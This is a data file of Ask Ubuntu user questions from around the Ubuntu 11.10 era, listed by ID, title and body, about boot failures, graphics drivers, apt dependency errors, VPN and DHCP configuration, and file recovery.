104378	boot stuck after discovering usb devices	i 'm trying to boot ubuntu 11.10 from a livecd on a newly built pc . the livecd is confirmed to work fine on a macbook pro . the boot process stops at a blinking cursor screen with grey text . it responds to keyboard presses , but they are just entered onto the screen an have no effect . unplugging and replugging usb devices in will cause it to display some status updates like `` usb device 4 unplugged.. '' waiting several hours has no effect . the cd drive is not spinning . any ideas ? motherboard : asus p8z68-v/gen3 processor : intel core i5 2500 graphics : nvidia gtx 570 .
104379	i can boot from usb a installation of windows 7 , but i ca n't do this with ubuntu or xbmc live	i 'm using a old pc with intel pentium 4 , 1gb ram , 200gb hd all this night i tried to boot ubuntu from usb ... i can do this with windows 7 normally i tried first using startup disk creator , but freezes . i tried using unetbootin , freezes too , choosing any option i tried cd , but continues the boot of windows the a i have installed so , i tried booting a easeus partition from boot , and work , and i format my disks normally but anyway , when i boot ubuntu , do n't work ... i do n't know what i do to install ubuntu in my pc , i need help ... thanks p.s . : sorry my english , i 'm from brazil i 'll explain using my language and translated in google translate then again explaining ... i am able to boot the windows installation via usb , works perfectly , but when i do this using the ubuntu image , it simply does not start . i followed all the steps from the ubuntu site itself to make a bootable usb using the startup disk creator program , i create perfectly and when i boot , just hangs/freezes on a purple screen . so i tried using unetbootin , i create perfectly on usb but when i boot hangs/freezes on the choice of options . so i finally put the image on a cd of ubuntu , and also does not work ... i 'm not having trouble creating a bootable usb , but the problem is own boot screen . i chose the option to boot from usb , it recognizes and simply does not work . i was able to install ubuntu on my sony vaio notebook , but this pc i can not in any way . i can install windows via usb as many times as i want , but ubuntu is not working . p.s . : the same thing happens with the xbmc live
104381	blank screen - only wallpaper shows up	i installed ubuntu from wubi in the iso and chose the option run alongside windows . i installed it on a separate hard-disk . after i login just a blank screen shows up ( shows a wallpaper and moving cursor though ) . i do n't know what to do . please help me soon .
104386	what is the /usr/share/initramfs-tools/scripts/casper-functions for ?	in my ubuntu-based system , everytime update-initramfs gets called i got errors like this : . : 6 : ca n't open /scripts/casper-functions so i took a look around and found the script casper-functions in /usr/share/initramfs-tools/scripts . using grep i found the scripts referencing /scripts/casper-functions . now i have two possibilities : comment out the lines referenciing the script ( which should n't make any difference , i think , because it 's not working anyway . ) fix all refences to this script . ( and fix a reference in the script itself ) i tried both and ran dpkg-reconfigure console-setup there have n't been any errors reported in any case . but before i do either of this ( and reboot ) i would like to know what this script does . i 'm not really familiar with sh-scripts , so i could n't figure it out , yet . update : i replaced all references of /scripts/casper-functions with /usr/share/initramfs-tools/scripts/casper-functions and replaced /scripts/functions with /usr/share/initramfs-tools/scripts/functions in casper-functions . as result a created live-cd ( remastersys - backup ) wo n't boot anymore ( it did boot before ) . so probably neither option may be well ... how can i get rid of these error messages then ? i read something about `` uninstalling canonincal-census-package '' , but i do n't have it installed and i ca n't find it via apt-get . so i 'm not able to install and uninstall it again as suggested in some forums .
104390	how to migrate gedit settings ?	so i 've just had to do a reinstall and as part of that process , i 'm starting a new account to remove some of the crufty config i 've built up over time . i 've been fairly successful cherry-picking certain applications ' configuration by copying over their old directories but gedit is being a pain . i 've already copied over the following : .gconf/apps/gedit-2 .local/share/gedit .config/gedit and that has allowed me to use my old plugins but nothing else . it 's not remembering colours , which plugins were enabled or individual plugin config . i 'm coming from the same version of ubuntu so would have expected this to cater for all my settings . i 'm afraid there might be config stuck in dconf .
104393	docky ca n't open apps which are added by `` pin to dock ''	i just installed docky on xubuntu and for adding home folder and terminal to it , i opened these apps and clicked on their icons for `` pin to dock '' . now , when i close them and then click on their respective icons on docky , nothing happens . what can be done ?
104394	how to disable the trackstick in dell ?	how to disable the trackstick which is in between the keys of the dell laptop keyboard . it really causes a lot of problem while typing .
104396	problem with connecting to hidden wireless adhoc networks in ubuntu 11.04	my ubuntu 11.04 works fine with wired networks ... when i try to connect it to a hidden wireless adhoc network , it says connection established.but i am not able to ping it nor connect to it . any idea ?
104398	how do i replace a cable modem router with my own server as dhcp ?	my isp gave me a really crappy router-modem-combination that lacks basic features . for instance you ca n't assign a constant ip to the mac adress of a client pc . i run a server for my home entertainment system and a storage server . both should have a static ip within my lan . so my thought was to disable the dhcp-server on the crappy modem and let my home entertainment server do the ip assignments . i was thinking dnsmasq , but i do n't seem to get it to work . i thought maybe someone can help me so the situation : 192.168.0.1 is the server ip in lan , lets say its mac is aa : aa : aa : aa : aa : aa and it is connected to a switch with device eth0 . here it 's /etc/network/interfaces : auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 192.168.0.1 netmask 255.255.255.0 gateway 192.168.0.2 192.168.0.2 is the ip of the cable modem ( set statically ) . it is connected to the internet and the same switch as the server . mac : bb : bb : bb : bb : bb : bb 192,168.0.3 is supposed to be the future ip of the network storage system , lets say its mac adress is cc : cc : cc : cc : cc : cc . it is also connected to the same switch as the other devices what i 've done so far : i 've installed dnsmasq on the server , stopped the service and edited /etc/dnsmasq.conf to look like this : interface=eth0 dhcp-range=192.168.0.10,192.168.0.254,72 dhcp-host=aa : aa : aa : aa : aa : aa , server,192.168.0.1 , infinite dhcp-host=bb : bb : bb : bb : bb : bb , cable,192.168.0.1 , infinite dhcp-host=cc : cc : cc : cc : cc : cc , storage,192.168.0.3 , infinite i 've edited /etc/resolv.conf to contain the localhost ( server ) and the nameservers of the isp : nameserver 127.0.0.1 nameserver 123.321.123.321 nameserver 321.123.321.123 the problem : the dhcp works just fine , but for some reason dnsmasq gives the wrong gateway . it gives the server 's ip instead of the gateways .
104400	how to put all traffic and on one interface and some traffic on another interface	at the moment i 'm working at a company and the problem is they allow ssh on wifi but not on their wired network . at the moment i push everything through a vpn , but that gives overhead on an already slow network . i was wondering how i could make all my traffic go through my eth0 but make my ssh connection use wlan0 instead of eth0 . it 's important all other traffic goes through eth0 as the wifi here is extremely slow , but just fast enough for a simple shell .
104404	pptp server - clients still have original ip	i have a vps with an openvpn server configured and running without a hitch . however , since i want to be able to use it as a vpn server for my iphone as well , i 've decided to switch to pptp . i installed it and i can connect to the server , but no matter what i do my computers and phone still show their own ip instead of the server 's . so my guess is that i have n't properly configured the server to route everything through it , like i intend . i 've followed a bunch of tutorials and tried all sorts of combinations , but nothing seems to work . when i set up my openvpn configuration i included these iptables rules : iptables -a forward -m state -- state related , established -j accept iptables -a forward -s 10.8.0.0/24 -j accept iptables -a forward -j reject iptables -t nat -a postrouting -s 10.8.0.0/24 -o eth0 -j masquerade since i just followed a tutorial i 'm not entirely sure what they do , but they appear to be what 's responsible for the server 's ip address being adopted by the clients . for my pptp configuration , i 've added this line to iptables and included it in /etc/rc.local to ensure it 's executed at boot , which according to my understanding should forward the server 's ip address : iptables -t nat -a postrouting -o eth0 -j masquerade i 've also enabled this in /etc/systcl.conf : net.ipv4.ip_forward=1 i do n't know if it matters , but i have dnsmasq installed from my openvpn configuration , and i 've set that to listen to 10.9.0.1 ( the ppp0 address for my pptp server ) . regardless , whenever i check my ip using whatismyip.com or any other checker , i get my original ip instead of the server 's . if i connect using openvpn , i get the server 's ip instead . if it 's of any importance , this is the guide i followed to set up the original openvpn server , i do n't know if any of the settings used there are what 's causing my problem : http : //library.linode.com/networking/openvpn/ubuntu-10.04-lucid thanks in advance for the help !
104405	error 'aticonfig : no supported adapters detected ' while installing amd catalyst	i have thinkpad e520 with two graphic cards : intel and ati radeon 6630m . i am using ubuntu 10.4 and laptop 's internal display runs only on 1024x . i can not use external displays ( they are not recognized ) . i am trying to fix this by switching from intel card to ati one . to this end , i downloaded amd catalyst 12.1 linux drivers , created package , and installed them . this driver supports my card . however , when i run aticonfig i get a message that my card is not found . aticonfig : no supported adapters detected any suggestions ?
104408	ca n't use nvidia drivers in dell inspiron n5110	i have a nvidia gt525m card installed in my dell inspiron n5110 laptop . after installing recommended drivers of my graphic card in ubuntu 11.10 it happens nothing but that disables unity3d effects and i started to hear the loud noise from the cooling system . to solve the problem i used sudo nvidia-xconfig , after rebooting my computer shows some text lines instead of showing gui . what should i do to solve this problem ?
104415	how do i increase cache size in chrome ?	is there any way to increase the cache size of google chrome in ubuntu 11.10 so that frequently visited pages load faster , im using a very-slow internet connection so i badly need this
104422	'e : unresolved dependencies . ' when trying to install new packages	i have installed lazarus ide downloaded from the website , not from ubuntu software manager . i could n't install it from usc so i downloaded it . but after i installed it using sudo dpkg -i *.deb ( which i run in downloaded folder ) i can not install or uninstall anything else . for example when i try to install scidavis i get : misery @ vaultdweller : ~ $ sudo apt-get install scidavis reading packages list ... ready building dependencies tree reading information about the status ... ready it is recoomended to run `` apt-get -f install '' , to repair them : following packages have dependency issues : lazarus-ide-0.9.30.2 : requires : libgdk-pixbuf2.0-0 ( > = 2.22.0 ) but it can not be installed requires : libgtk2.0-0 ( > = 2.24.0 ) ale 2.20.1-0ubuntu2.1 is to be installed lazarus-ide-gtk2-0.9.30.2 : requires : libgdk-pixbuf2.0-0 ( > = 2.22.0 ) but it can not be installed requires : libgtk2.0-0 ( > = 2.24.0 ) ale 2.20.1-0ubuntu2.1 is to be installed lcl-qt4-0.9.30.2 : requires : libqt4pas-dev but it can not be installed scidavis : requires : libmuparser0 but will not be installed requires : libqt4-qt3support ( > = 4:4.5.3 ) but will not be installed requires : libqwt5-qt4 but will not be installed requires : libqwtplot3d-qt4-0 but will not be installed e : unresolved dependencies . please try `` apt-get -f install '' without packages ( or provide solution ) . lazarus works fine , as every other previously installed app . if i use recommended apt-get -f install it removes lazarus packages and lazarus works no more , but usc and apt-get work well . how to repair that ?
104424	how to delete ubuntu from boot menu in uefi-startup sources	i had ubuntu on my computer , but i do n't use ubuntu anymore . i still have the ubuntu option on my computer 's boot menu in uefi . how do i delete this crappy useless boot option with windows and without linsucks ?
104430	how do i make the system to recognize my dvd and cd drives	i installed mythbuntu 11.10 , but it does n't recognize my dvd and cd drives on dell desktop 8400 . how do i make it to recognize them ? thanks , frank
104431	how do i enable multi touch on a dell inspiron n5110 with an alps touchpad ?	how can i enable touch pad gestures ( multi touch effects ) of alps touch pad which comes with dell inspiron n5110 in ubuntu 11.10 . these gestures worked fine with windows .
104432	make ubuntu boot from a folder other than /	is there a way that you can move an ubuntu install to its own folder in a partition ? if so , what settings do i have to change ? ( i imagine i would have to change grub settings and /etc/fstab . ) i 'm asking this question because i was using btrfs and its multiple subvolumes feature to boot about 5 different distros . i had enough room to do this on my disk because the filesystem made it so that the free space was shared unlike partitions . but the problem is that btrfs is very slow on ubuntu . it could take as much as 10 minutes for ubuntu to boot . i would like to make one big ext4 filesystem and then make folders like /ubuntu10.10 , /mint10.10 , /opensuse , /arch , /fedora16 , etc and boot from them . after seeing how flexible linux is with the boot options when i was setting up the btrfs setup , i 'm suspecting there is a way to do this . edit about virtualization : i do n't want to do virutalization because of the performance hit involved-i only have 1.5 g of ram , and ubuntu does a pretty good job of using that without virtualizing anything . the other problem is that if delete something on a vm , then it does not free the space in the image . plus , you do n't get things like graphical acceleration easily with vms . also , i recently set up luks ( linux 's disk encryption ) on another system and it seems like there it is actually possible to do a fair amount from the initial image before you mount the root filesystem . ( i saw a howto that set up a ssh server in that image , so you could remote in and type the key so the system could be booted remotely ) . the other reason i think this must be possible is that somehow the livecd 's mount the cd 's filesystem , make a ram filesystem , and then make a aufs filesystem from the two , and then mount the aufs filesystem as the root . i 'm thinking that if you can read filesystems without having the root filesystem in place , then ca n't you just read the one ext4 filesystem and then make a bind mount from /ubuntu10.10 to / and use that ?
104440	how do you resize the standard ubuntu desktop inside of virtualbox ?	so i 've installed ubuntu inside of virtualbox , and i resized the window of virtualbox to be full-size , but the ubuntu desktop stays the same standard size . how do i make the width of ubuntu stretch 100 % across the virtualbox window ?
104443	getting started with developing desktop themes	from a development standpoint , where would one start in developing their own themes for the ubuntu desktop . obviously , the artist would need image editing software like : gimp , or photoshop , via virtualbox or wine what other software would someone need that is ubuntu based ? are there other concerns that one should look out for ? thanks in advance .
104448	fan noise and overheating problem in dell inspiron n5110	i have installed ubuntu 11.10 in a dell inspiron n5110 laptop and it works fine . but i can hear a continuous noise from the cooling system . what should i do to solve this problem ?
104450	alternative to nautilus archiver handler	when i compress files , i expect two basic options . none of which are present in nautilus 's `` compress ... '' context menu action , and instead there is only option to set password . so thought to ask for some solution if someone has already solved this nicely . most important to me : 1 - compression level because often i just want to store files fast . and i do n't want to compress hard ( default option ) files that are already compressed ( audio , video , pdf , exe etc ) , saving both time/speed and efficiency , and yet future efficiency when unpacking ; ) another thing with which i can live without , but prefer it present : 2 - compression algorithm simply i choose different algorithm for text and binary files i usually use 7z or rar , but also gzip update : i could n't imagine this would be such problem . i found only xarchiver in repository , but it 's also optionless as file-roller simpleton . then i searched for file-roller alternatives which i might call from nautilus actions : peazip it does n't support arguments and has ugly gui . i do n't understand why developers do n't use system theme api , and after that provide themes if they think that 's cool . not mentioning i do n't see point of gui themes for archive manager ? removed immediately freearc gui client ca n't be used with arguments , so i ca n't use it for my task . other then that has lot of options . i let it be , and decide later what to do with it other ? writing multiple scripts for nautilus actions is dumb . zenity does not offer more then single input box , or single list or single ... writing tk python script does not look good and i do n't know gtk to do better seems like dead end : (
104459	when i add myself `` vboxusers '' group i an no longer in the `` admins '' group	i 'm using ubuntu 11.10 and i installed virtualbox . this required me to add myself to the vboxusers group but when i add myself to vboxusers group i am no longer be in other groups and especially admins group ! when i add myself back to admins group i no longer be am in the vboxusers group ! commands that i used to add user to `` vboxusers '' : usermod -g vboxusers myusername to add user back to admins group in single user mod : usermod -ag admin myusername
104468	is there a ticker application available ?	by ticker application , i mean a ticker application , which will display rss feeds as well as my own rss feed and i can place this feed anywhere on the desktop .
104474	cmd.exe emulator in ubuntu to run .cmd/.bat file	the title says it all . i need to create batch files and run and test them . i dont have any windows machine . if there was any cmd.exe emulator in ubuntu i would have worked on it . so do you know emulator that can run .bat/.cmd files ? i know i can use vmware , virtualbox-ose . but to use it i need existing windows which i dont have .
104476	missing password	i just installed again ubuntu 11.10 because ubuntu asked me for a password that i did n't have ... and now again ... because i have just gone to the configuration of the users accounts and i removed the root password , and now ubuntu asks me for a password , and i put the removed password but it says me that it 's incorrect ! and now i cant install anything because it ask me for a password sorry about my english ...
104477	why is n't transmission working ?	i 'm using the latest version of ubuntu and transmission . according to transmission , the file i am downloading has 0 peers and is idle , even though there are a few peers seeding it . here 's a batch of error messages from transmission 's log : > could not connect to tracker . tracker gave http response code 503 , 504 this is the firewall 's status : > to action from -- -- -- -- -- -- 51413/tcp allow anywhere 51413/udp allow anywhere 51413/tcp allow anywhere ( v6 ) 51413/udp allow anywhere ( v6 ) 51413/tcp allow out anywhere 51413/udp allow out anywhere 25,53,80,110,443/tcp allow out anywhere 53/udp allow out anywhere 67,68/udp allow out anywhere 5050/tcp allow out anywhere 51413/tcp allow out anywhere ( v6 ) 51413/udp allow out anywhere ( v6 ) 25,53,80,110,443/tcp allow out anywhere ( v6 ) 53/udp allow out anywhere ( v6 ) 67,68/udp allow out anywhere ( v6 ) 5050/tcp allow out anywhere ( v6 ) also , transmission says that port 51413 is open .
104479	what is temperature limit for intel i5 processors ?	i am using ubuntu for a quite long time now . i am concern about laptop getting hot . so i would like to know is it safe to have acpi temperature 90 c ? or it could damage my laptop ?
104487	lirc , irxevent : why does n't it work with nautilus ?	i 'm on ubuntu 11.10 with unity 3d and use a remote control via lirc . everything works fine in applications like firefox , banshee , but when i focus nautilus or gedit any key which refers to `` currentwindow '' does n't work , i. e. ( from ~/.lircrc ) : begin prog = irxevent button = key_ok config = key return currentwindow end i know that it worked on an older system , like 11.04 . any ideas ?
104492	smallest netbook that runs ubuntu ?	i am looking for an ubuntu netbook that is very small . if possible , the size of the hp 95lx . if anybody remembers those old dos , or windows ce devices , that were basically calculator size , with keyboards , i 'm sure you can see what i mean . i am aware of pandora and it seems nearly perfect ( if you settle for running its custom linux instead of ubuntu ) , but as it 's a small privately produced unit , and not currently commercially available , i 'm looking for something that is available now in north america .
104493	errors were encountered while processing : man-db	i get this error when i use apt-get upgrade & apt-get autoremove and on every apt-get [ something ] .. and when i try to install applications too : errors were encountered while processing : man-db e : sub-process /usr/bin/dpkg returned an error code ( 1 )
104494	math editor for algebra 2 and trigonometry	my son has cerebral palsy and is taking high school algebra 2/trig . i am looking for the best way for him to efficiently complete homework problems which include both equations and drawings that his teacher requires to accompany the problems to show his work . he has a school mac that dual boots mac and windows . i am trying to offer a solution with my newly acquired ubuntu laptop . is there a software solution - for example - with libreoffice , that has a math editor ?
104496	difference between /home and /home ?	total ubuntu/linux in general nood here . what is the difference between /home and /home ? i 've noticed i need to use sudo to do anything in /home . /home ( home folder ? ) has pictures , videos , etc . in it so thats where i want to really create new folders and stuff but i cant seem to get to it using cd .
104498	logout when pressing on `` shutdown '' [ ubuntu 11.10 ]	when i click shutdown from the menu it logs off . when i click shutdown from the log-in menu it does nothing .
104504	how to improve the speed of a usb-based installation of ubuntu ?	the setup : thinkpad x40 without harddisk , 1gb of ram . the hard-disks for these models are very slow , rare and expensive . this is why i installed ubuntu 11.10 onto the usb . the system will be used for net - ff , and some office docs editing . if possible , i might setup a second pc , used for xbmc . i have tried live ubuntu usbs with the same pc and usb , and the setup is ok . i am limited to 4 gbs , though . this is why i chose to perform normal install . the problems : the system feels slow , and freezes every other second . i have no swap , only one root partition . what i have tried : sudo apt-get install preload use memory instead of disk add these lines to /etc/sysctl.conf , and reboot . vm.swappiness = 0 vm.dirty_background_ratio = 20 vm.dirty_expire_centisecs = 0 vm.dirty_ratio = 80 vm.dirty_writeback_centisecs = 0 mount /tmp onto ramdisk code : mkdir /dev/shm/tmp chmod 1777 /dev/shm/tmp mount -- bind /dev/shm/tmp /tmp still , the system is slow to the point of being unusable . are there any other tweaks that can be done . i read that some parts of the system might be mounted into ram , and that would be beneficial , but which parts and how to do that . i also read that compressing parts of the system might help , i dont know how to do that , too
104507	pointer is all odd after update	i just did the pushed `` important security update '' s and now my pointer is an odd string of small black dots . i ca n't find any way to change it and it is making the system difficult to navigate . ( 11.10 )
104509	how do i change the icon and text color ?	suddenly all of my icons and the text under the icons became grey in color . i want the theme to be as it was when i first installed ubuntu 11.10 . the menu color was dark grey and icons were orange or red . how do i reset my icon and color theme to default ?
104510	what are the requirements of the canonical reseller partner program ?	i am planning to start a company to sell open source software solutions , like ubuntu in enterprise space . i have around 6 years of experience in it and software sales , so i think this is the right time for me to make an entrepreneurial move . since i love foss and want to contribute to the development of foss and especially ubuntu ( through business development ) since i know that the only way companies like canonical make money is by selling their open source solutions in enterprises ( support and trainings ) . i do n't have any direct experience in the linux/open source development , neither by qualification nor by work experience , but i have an experience of using and troubleshooting linux from around 8 years , i think i have good enough knowledge to train and support linux desktop . and i have it and software sales experience too . my question is what are the requirements of canonical for partnering with a company , especially with people with my experience ? and how should i approach canonical for such a partnership ? secondly what are the barriers and challenges starting a business providing open source solutions ? i would be highly thankful if somebody who had such a contact/discussion with canonical , or is in the business of selling open source solutions , or have any knowledge about this issue , could guide me in this regard .
104514	how do i install packages with pip when there are multiple python versions ?	i have different versions of python installed , python 2.7 being the default and 3.2 the second . now i want to install pyramid to the 3.2 installation . how can i do this ? just using pip to install pyramid does not work , so how can i change the version it is downloading to ?
104515	how to resume an svn download ?	i was trying to download a very big package using svn . it got interrupted after about an hour due to internet connection failure . now when i have restored the connection is it possible to resume the download from the point where it earlier left ? i used the following command to begin the download cd ~/ < your_working_dir > svn co https : //code.ros.org/svn/opencv/branches/2.3 right now the terminal window is still as shown
104523	shutdown 3g modem	how can i shutdown 3g modem ( ttyusb0 ) ? because even when i shutting down i see the lights on it . so maybe my question is : how i can eject 3g modem . or how i can unmount it . help me to find out in my question and in the solution .
104525	xubuntu applications menu still shows deleted applications	i originally installed ubuntu 11.10 on a 64 bit pc , then installed the xubuntu desktop . i deleted some applications and eventually the gnome desktop . the xubuntu applications menu still shows applications i 've deleted . how can i get it to accurately display the applications/software on my computer ? i also still see the gnome desktop as an option when i first log in . i 'm confused and am very much a newbie to linux , so please keep it simple . thanks .
104527	how do i install the latest nvidia drivers via the additional drivers tool ?	well obviously i can do it manually , i was just wondering why are n't these drivers available through `` additional drivers '' , and why are the versions available there outdated .
104529	screen brightness does n't change . gateway nv54	i have a gateway nv54 and the screen brightness does not change . so i installed indicator brightness but this did not change it . and the brightness is the same when the charge is plugged in or unplugged . what can i do about this ?
104537	caught signal 15 when shutting down	when i doing shutdown , my laptop freezing after the next lines : network-manager : caught signal 15 umount /run/lock is not mounted into /run/lock i can found ttyusb0 file . what i can do in this situation ? also i should add that ttyusb0 - this is my 3g modem .
104542	is there a way to password protect individual folders ?	let 's say that i have a folder , within my documents folder , that has files i want no one to access without a password . is there a way to lock down that folder so that it 's password protected / encrypted ? in fact , is it possible to password-protect any individual folder ?
104549	mounted mac drive file error	i accidentally killed my macbook by water damage , and now i 'm to primarly extract my images . i mounted the drive ( hfs+ formated ) on my stationary pc using the storage device manager . i 'm able to browse the drive and copy the picures of some directories within the picures folder of the mac drive , but for other directories , for example this one containing three pictures , i get the follwing when running ls -l ls : can not access dsc00001.jpg : input/output error ls : can not access dsc00002.jpg : input/output error ls : can not access dsc00003.jpg : input/output error ls : reading directory . : input/output error total 3 drwxrwxrwx 1 501 dialout 1957 2011-12-11 18:22 ./ drwx -- -- -- 1 501 dialout 82 2012-01-18 20:51 ../ - ? ? ? ? ? ? ? ? ? ? ? ? ? ? dsc00001.jpg - ? ? ? ? ? ? ? ? ? ? ? ? ? ? dsc00002.jpg - ? ? ? ? ? ? ? ? ? ? ? ? ? ? dsc00003.jpg ... so ... are these files all toast , or is there something i can do ? update : i tried using ddrescue on a file , but got an input/output error there aswell .
104554	which desktop environment to use if unity test on 11.04 did n't run well on one test ?	i 'm running now natty ( ubuntu 11.04 ) but the unity test fail on one topic although i have a nvidia chip on my dell 620 . will i have a gnome desktop after installing ubuntu 11.10 although unity did not run on my 11.04 ? i ca n't trust the live cd since it does not use the nvidia proprietary drivers while running .
104564	can i get gnome 3.2 working on 10.04.3 lts ?	tried a few how-to guides on the web and to no avail . is there a way to do this and does it work okay without breaking anything ? craig
104565	steps to take before resizing partition to prevent damaging data	i use ubuntu 11.10 and have three partitions , one ext4 for the root directory , one ext4 for the /home and one for swap . i need to release disk space so i can increase swap space , and create a new partition for a windows installation ( meh , but it 's a need for work stuff like visual studio ) . so i was thinking about resizing the /home partition ( taking off 50gbs of about 60gb free it has ) but i 'm kinda afraid of things going wrong and losing /home data in this operation . so , what things should i do to increase safety ? ( i 'm not in conditions to make a proper backup right now ) .
104566	rhythmbox build error	i 'm trying to build rhythmbox in order to fix a bug , but am running into problems doing so . i downloaded the source using sudo apt-get source rhythmbox afterwhich i ran configure with the argument -- prefix=/home/notgary/rhythmbox/build in order to keep the compiled binary from messing up my existing system . after running make and make install , which successfully placed a binary at /home/notgary/rhythmbox/build/bin/rhythmbox , i tried to run the program and got the output that can be seen below . i 've got little experience with building linux programs from source so am at a loss to figure out why this is happening . does anyone know how i can get a compiled binary of rhythmbox ( or any other app from the repositories for that matter ) up and running ? ( rhythmbox:27863 ) : glib-gio-critical ** : settings schema 'org.gnome.rhythmbox ' is not installed ( rhythmbox:27863 ) : glib-gio-critical ** : settings schema 'org.gnome.rhythmbox.rhythmdb ' is not installed ( rhythmbox:27863 ) : glib-gio-critical ** : settings schema 'org.gnome.rhythmbox.podcast ' is not installed ( rhythmbox:27863 ) : glib-gio-critical ** : g_settings_get_key_info : assertion `settings- > priv- > schema ! = null ' failed ( rhythmbox:27863 ) : glib-gio-critical ** : settings schema 'org.gnome.rhythmbox.player ' is not installed ( rhythmbox:27863 ) : glib-gio-critical ** : settings schema 'org.gnome.rhythmbox ' is not installed ( rhythmbox:27863 ) : glib-gio-critical ** : g_settings_get_key_info : assertion `settings- > priv- > schema ! = null ' failed ( rhythmbox:27863 ) : glib-critical ** : g_variant_get_type : assertion `value ! = null ' failed ( rhythmbox:27863 ) : glib-critical ** : g_variant_type_is_subtype_of : assertion `g_variant_type_check ( type ) ' failed ( rhythmbox:27863 ) : glib-critical ** : g_variant_get_boolean : assertion `g_variant_is_of_type ( value , g_variant_type_boolean ) ' failed ( rhythmbox:27863 ) : glib-critical ** : g_variant_unref : assertion `value ! = null ' failed ( rhythmbox:27863 ) : glib-gio-critical ** : g_settings_get_key_info : assertion `settings- > priv- > schema ! = null ' failed ( rhythmbox:27863 ) : glib-critical ** : g_variant_get_type : assertion `value ! = null ' failed ( rhythmbox:27863 ) : glib-critical ** : g_variant_type_is_subtype_of : assertion `g_variant_type_check ( type ) ' failed ( rhythmbox:27863 ) : glib-critical ** : g_variant_get_double : assertion `g_variant_is_of_type ( value , g_variant_type_double ) ' failed ( rhythmbox:27863 ) : glib-critical ** : g_variant_unref : assertion `value ! = null ' failed ( rhythmbox:27863 ) : glib-gio-critical ** : g_settings_get_key_info : assertion `settings- > priv- > schema ! = null ' failed ( rhythmbox:27863 ) : glib-critical ** : g_variant_get_type : assertion `value ! = null ' failed ( rhythmbox:27863 ) : glib-critical ** : g_variant_type_is_subtype_of : assertion `g_variant_type_check ( type ) ' failed ( rhythmbox:27863 ) : glib-critical ** : g_variant_get_double : assertion `g_variant_is_of_type ( value , g_variant_type_double ) ' failed ( rhythmbox:27863 ) : glib-critical ** : g_variant_unref : assertion `value ! = null ' failed ( rhythmbox:27863 ) : glib-gio-critical ** : g_settings_get_key_info : assertion `settings- > priv- > schema ! = null ' failed ( rhythmbox:27863 ) : glib-critical ** : g_variant_get_string : assertion `value ! = null ' failed ( rhythmbox:27863 ) : glib-critical ** : g_variant_unref : assertion `value ! = null ' failed ( rhythmbox:27863 ) : rhythmbox-critical ** : rb_play_order_new : assertion `porder_name ! = null ' failed ( rhythmbox:27863 ) : glib-gobject-warning ** : invalid ( null ) pointer instance ( rhythmbox:27863 ) : glib-gobject-critical ** : g_signal_connect_object : assertion `g_type_check_instance ( instance ) ' failed ( rhythmbox:27863 ) : rhythmbox-critical ** : rb_play_order_playing_source_changed : assertion `rb_is_play_order ( porder ) ' failed ( rhythmbox:27863 ) : glib-gio-critical ** : g_settings_get_key_info : assertion `settings- > priv- > schema ! = null ' failed ( rhythmbox:27863 ) : glib-critical ** : g_variant_get_type : assertion `value ! = null ' failed ( rhythmbox:27863 ) : glib-critical ** : g_variant_type_is_subtype_of : assertion `g_variant_type_check ( type ) ' failed ( rhythmbox:27863 ) : glib-critical ** : g_variant_get_boolean : assertion `g_variant_is_of_type ( value , g_variant_type_boolean ) ' failed ( rhythmbox:27863 ) : glib-critical ** : g_variant_unref : assertion `value ! = null ' failed ( rhythmbox:27863 ) : glib-gio-critical ** : g_settings_get_key_info : assertion `settings- > priv- > schema ! = null ' failed ( rhythmbox:27863 ) : glib-critical ** : g_variant_get_string : assertion `value ! = null ' failed ( rhythmbox:27863 ) : glib-critical ** : g_variant_unref : assertion `value ! = null ' failed segmentation fault
104568	my ubuntu server filesystem just crashed . need some help ! how to recover files or filesystem ?	none of my sites worked , saying that the /tmp/ folder was not writeable . i ssh-ed into the server , and indeed , everyting was read only . i restarted with the fsck flag , and now i get a grub error . any tips on recovering my data ? in order of importance , i need the mysql database folder ( lots of man hours went there ) . i can get my code back from my repository . its running on vmware so before i attempt anything insane i will copy over the image and see what i can recover . it was running on ubuntu 8.10 , ex3 i believe . do you guys have any insight to where i should navigate ?
104582	cpufreq not available 11.10	on 11.04 i had cpufreq working on my `` amd turion ( tm ) 64 x2 mobile technology tl-50 stepping 02 '' processors , however now on oneiric cpufreq wo n't load . the core temperature of my cpu is normally 40 c , but lately it 's cooking away at 75-80+ c and the fan is always extremely loud even when cpu usage has at 0.4 % . and after this dmesg | grep -i cpu i got : brought up 2 cpus switch to broadcast mode on cpu1 switch to broadcast mode on cpu0 switched to nohz mode on cpu # 1 switched to nohz mode on cpu # 0 acpi : acpi_idle registered with cpuidle cpufreq-nforce2 : no nforce2 chipset . cpuidle : using governor ladder cpuidle : using governor menu powernow-k8 : found 1 amd turion ( tm ) 64 x2 mobile technology tl-50 ( 2 cpu cores ) ( version 2.20.00 ) i see something about governors and ladder there , does this mean the os is able to scale my cpu 's or not ? if so is there a way i can determine it 's working ? i saw that for other users that the wrong module had been loaded and by disabling it they were able to get cpufreq loaded . how can i tell what scaling module is loaded ? stats : ubuntu oneiric 32bit dell inspiron 1501
104584	how do ubuntu libreoffice builds differ from vanilla libreoffice builds ?	i 've got a question about libreoffice that 's been bugging me since openoffice : the versions of lo that come on the ubuntu disc or from the ppa always have nice font rendering , but whenever i download and install the debs from the lo website , the font rendering in those versions looks terrible . i know the ubuntu builds include various patches and tweaks that are n't in the vanilla debs , but could anyone help educate me about exactly how the ubuntu builds of lo differ from the vanilla debs of lo , and if there is an easy way to apply those changes to the vanilla debs so i do n't have to wait so long for the ppa to update with the new version ?
104585	update manager saying error on line 59 in sources list	ca n't figure out where my problem is . i tried to post my sources list but apparently ubuntu wo n't let a new user post more then two hyperlinks so yea any suggestions on how to post that .
104587	`` apt-get '' not finding packages on terminal	i have been trying to install different packages via terminal , like laptop-mode-tools , xserver-xorg-input-multitouch or xserver-xorg-input-mtrack , but it never works because i get the error : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package xserver-xorg-input-mtrack normally i have been able to install this stuff through the synaptic package manager , but i ca n't find there the `` mtrack '' driver . any idea why apt-get is not working ? i have already run sudo apt-get update several times . edit : i 'm running ubuntu 11.10 in a macbook pro with dual boot ( leopard )
